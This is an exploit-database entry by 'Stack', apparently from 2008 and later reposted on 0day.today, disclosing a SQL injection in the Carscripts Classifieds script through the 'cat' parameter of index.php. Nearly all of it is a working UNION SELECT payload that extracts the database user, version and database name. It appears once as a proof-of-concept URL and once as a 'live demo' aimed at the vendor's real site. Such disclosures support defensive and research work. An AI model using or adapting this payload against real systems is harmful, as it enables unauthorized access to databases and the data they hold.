id: 3218
date: 06/17/2008
title: Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability
author: Stack
cves: 

=========================================================================
Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability
=========================================================================


Carscripts Classifieds Sql INjection

By Stack
###########################################
[+] : you can see the Result in 'Title'
[+] : Open the source page to see the result
###########################################
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

live demo
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*



#  0day.today [2023-03-27]  #